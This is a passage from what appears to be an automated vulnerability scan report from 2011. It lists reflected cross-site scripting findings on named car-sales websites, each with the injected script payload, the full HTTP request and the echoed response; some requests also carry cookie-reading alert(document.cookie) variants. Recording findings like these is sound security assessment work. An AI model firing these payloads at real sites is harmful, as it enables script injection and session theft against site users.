Date: Mon, 24 Jan 2011 23:44:04 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:44:04 GMT;path=/
Set-Cookie: ID=;expires=Sun, 24-Jan-2010 23:44:04 GMT;path=/
Set-Cookie: ID=4%3BABTL;path=/
Set-Cookie: HOMEVERSION=2;path=/


<html>
<head>
   <title>Signup</title>
   <link rel="stylesheet" type="text/css" href="/interface/abtl/cars.css">
</head>
<body>

<!-- " ---></TD></TD></TD></TH></TH></TH></TR></TR></TR></TABL
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Could not find the included template act_handler1d65d<img src=a onerror=alert(1)>413a205e61a.cfm.
</h1>
...[SNIP]...

4.502. http://www.autobytel.com/coupons/my-garage.htm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /coupons/my-garage.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d81a"><script>alert(1)</script>f5d32ebedf5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupons/my-garage.htm?7d81a"><script>alert(1)</script>f5d32ebedf5=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:53:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:53:59 GMT
Content-Length: 22155
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:53:58 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/coupons/my-garage.htm?7d81a"><script>alert(1)</script>f5d32ebedf5=1">
...[SNIP]...

4.503. http://www.autobytel.com/diagnose-problem/my-garage.htm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /diagnose-problem/my-garage.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45bf5"><script>alert(1)</script>ab4ad55d4a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /diagnose-problem/my-garage.htm?45bf5"><script>alert(1)</script>ab4ad55d4a5=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:53:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:53:43 GMT
Content-Length: 22199
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:53:42 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/diagnose-problem/my-garage.htm?45bf5"><script>alert(1)</script>ab4ad55d4a5=1">
...[SNIP]...

4.504. http://www.autobytel.com/my-garage.htm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /my-garage.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b79c"><script>alert(1)</script>b4f72701277 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my-garage.htm?6b79c"><script>alert(1)</script>b4f72701277=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:53:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:53:04 GMT
Content-Length: 22077
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:53:04 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/my-garage.htm?6b79c"><script>alert(1)</script>b4f72701277=1">
...[SNIP]...

4.505. http://www.autobytel.com/new-car-price-quotes.htm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /new-car-price-quotes.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7519c"><script>alert(1)</script>65d403b7baa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-car-price-quotes.htm?7519c"><script>alert(1)</script>65d403b7baa=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:55:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:55:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:55:46 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:55:46 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 62743


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/new-car-price-quotes.htm?7519c"><script>alert(1)</script>65d403b7baa=1">
...[SNIP]...

4.506. http://www.autobytel.com/repair-cost-calculator/my-garage.htm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /repair-cost-calculator/my-garage.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60236"><script>alert(1)</script>044cc4d79e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /repair-cost-calculator/my-garage.htm?60236"><script>alert(1)</script>044cc4d79e2=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:55:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:55:05 GMT
Content-Length: 22226
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:55:05 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/repair-cost-calculator/my-garage.htm?60236"><script>alert(1)</script>044cc4d79e2=1">
...[SNIP]...

4.507. http://www.autobytel.com/sitemap/index.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /sitemap/index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c053"><script>alert(1)</script>033a7d26254 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sitemap/index.cfm?9c053"><script>alert(1)</script>033a7d26254=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:57:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:57:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:57:27 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 51417


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/sitemap/index.cfm?9c053"><script>alert(1)</script>033a7d26254=1">
...[SNIP]...

4.508. http://www.autobytel.com/used-cars.htm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /used-cars.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75453"><script>alert(1)</script>f5531f9e8e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /used-cars.htm?75453"><script>alert(1)</script>f5531f9e8e2=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 79111
Expires: Mon, 24 Jan 2011 23:54:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:54:11 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:54:11 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:54:11 GMT;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/used-cars.htm?75453"><script>alert(1)</script>f5531f9e8e2=1">
...[SNIP]...

4.509. http://www.autocheck.com/ [siteID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autocheck.com
Path:   /

Issue detail

The value of the siteID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ddbac"%3balert(1)//c700bf66469 was submitted in the siteID parameter. This input was echoed as ddbac";alert(1)//c700bf66469 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?WT.mc_id=1824&siteID=1824ddbac"%3balert(1)//c700bf66469 HTTP/1.1
Host: www.autocheck.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:54:25 GMT
Server: Apache
Set-Cookie: Apache=173.193.214.243.313621295913265271; path=/; expires=Wed, 23-Feb-11 23:54:25 GMT
Cache-Control: private
P3P: policyref="http://www.autocheck.com/w3c/p3p.xml", CP="NON DSP COR NID TAIa OUR NOR STA"
Cache-Control: private
Set-Cookie: referralCookie=aAvYRKxoy9j9tyYC62; path=/; expires=Wed, 23-Feb-2011 23:54:24 GMT
Set-Cookie: JSESSIONID=aAvYRKxoy9j9tyYC62; path=/
Connection: close
Content-Type: text/html
Content-Length: 30580


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1
...[SNIP]...
<!--
var opt_siteId="1824ddbac";alert(1)//c700bf66469";
var opt_marketing_code="";
var opt_banner_id="";
//-->
...[SNIP]...

4.510. http://www.autocheck.com/ [siteID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autocheck.com
Path:   /

Issue detail

The value of the siteID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71a71"><script>alert(1)</script>6dab831a574 was submitted in the siteID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?WT.mc_id=1824&siteID=182471a71"><script>alert(1)</script>6dab831a574 HTTP/1.1
Host: www.autocheck.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:54:22 GMT
Server: Apache
Set-Cookie: Apache=173.193.214.243.19341295913262634; path=/; expires=Wed, 23-Feb-11 23:54:22 GMT
Cache-Control: private
P3P: policyref="http://www.autocheck.com/w3c/p3p.xml", CP="NON DSP COR NID TAIa OUR NOR STA"
Cache-Control: private
Set-Cookie: referralCookie=bFL73dHR0oz-n3XC62; path=/; expires=Wed, 23-Feb-2011 23:54:22 GMT
Set-Cookie: JSESSIONID=bFL73dHR0oz-n3XC62; path=/
Connection: close
Content-Type: text/html
Content-Length: 30844


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1
...[SNIP]...
<a class="main" href="http://usedcars.autocheck.com?WT.mc_id=182471a71"><script>alert(1)</script>6dab831a574&siteID=182471a71">
...[SNIP]...

4.511. http://www.autotrader.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc4cb"%3balert(1)//1ee177b82c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bc4cb";alert(1)//1ee177b82c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?bc4cb"%3balert(1)//1ee177b82c=1 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; BIGipServerwww=1317593098.61475.0000;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:57:06 GMT
Server: Apache
Set-Cookie: JSESSIONID=73D9E7C5239D08C715DEA475D07D7060; Path=/
Set-Cookie: ATC_USER_ZIP=; Domain=.autotrader.com; Expires=Tue, 31-Jan-2012 23:57:06 GMT; Path=/
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: BIGipServerAT-Production_hhtp=3979503114.61475.0000; path=/
Content-Length: 60162


<!DOCTYPE html P
...[SNIP]...
<script type="text/javascript">
BIRFPageData = {
pg_inst:"376865021865166256",
logDomain:"http://www.autotrader.com",
my:false,
params:{
"bc4cb";alert(1)//1ee177b82c":"1",
"disableImpressions":"false"
}
};
</script>
...[SNIP]...

4.512. http://www.autotrader.com/hornav/trader/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /hornav/trader/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2aba"%3balert(1)//c38b5e5e306 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c2aba";alert(1)//c38b5e5e306 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hornav/trader/index.jsp?c2aba"%3balert(1)//c38b5e5e306=1 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; BIGipServerwww=1317593098.61475.0000;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:56:30 GMT
Server: Apache
Set-Cookie: JSESSIONID=C360AF28D0BC5EDA43BF2A39CE968F78; Path=/
Set-Cookie: ATC_USER_ZIP=; Domain=.autotrader.com; Expires=Tue, 31-Jan-2012 23:56:30 GMT; Path=/
Set-Cookie: ac_afflt=; Path=/
Content-Language: en
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: BIGipServerAT-Production_hhtp=3476186634.61475.0000; path=/
Content-Length: 43866


<birf:pageLoad pg="syc_lp"></birf:pageLoad>
<script type="text/javascript">
BIRFPageData = {
pg_inst:"624621212101090264",
logDomain:"http://www.autotrader.com",
my:false,
params:{
"c2aba";alert(1)//c38b5e5e306":"1",
"disableImpressions":"false"
}
};
</script>
...[SNIP]...

4.513. http://www.autotraderstatic.com/dwr/interface/MarketManager.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autotraderstatic.com
Path:   /dwr/interface/MarketManager.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 15dee<script>alert(1)</script>1c89ef9af97 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dwr/interface/MarketManager.js15dee<script>alert(1)</script>1c89ef9af97?v=3.17.167500 HTTP/1.1
Host: www.autotraderstatic.com
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: M7F1=CT

Response

HTTP/1.1 501 Not Implemented
Server: Apache
Last-Modified: Tue, 07 Dec 2010 13:18:55 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: max-age=604758
Date: Tue, 25 Jan 2011 02:52:30 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 74

No class by name: MarketManager15dee<script>alert(1)</script>1c89ef9af97

4.514. http://www.autotraderstatic.com/dwr/interface/ModelSearchUtil.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autotraderstatic.com
Path:   /dwr/interface/ModelSearchUtil.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d8912<script>alert(1)</script>804014494e4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dwr/interface/ModelSearchUtil.jsd8912<script>alert(1)</script>804014494e4?v=3.17.167500 HTTP/1.1
Host: www.autotraderstatic.com
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: M7F1=CT

Response

HTTP/1.1 501 Not Implemented
Server: Apache
Last-Modified: Tue, 07 Dec 2010 12:49:02 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: max-age=604763
Date: Tue, 25 Jan 2011 02:52:30 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 76

No class by name: ModelSearchUtild8912<script>alert(1)</script>804014494e4

4.515. http://www.autotraderstatic.com/dwr/interface/UserMsgController.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autotraderstatic.com
Path:   /dwr/interface/UserMsgController.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a4a28<script>alert(1)</script>00a7fd303d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dwr/interface/UserMsgController.jsa4a28<script>alert(1)</script>00a7fd303d HTTP/1.1
Host: www.autotraderstatic.com
Accept: */*
Accept-Language: en
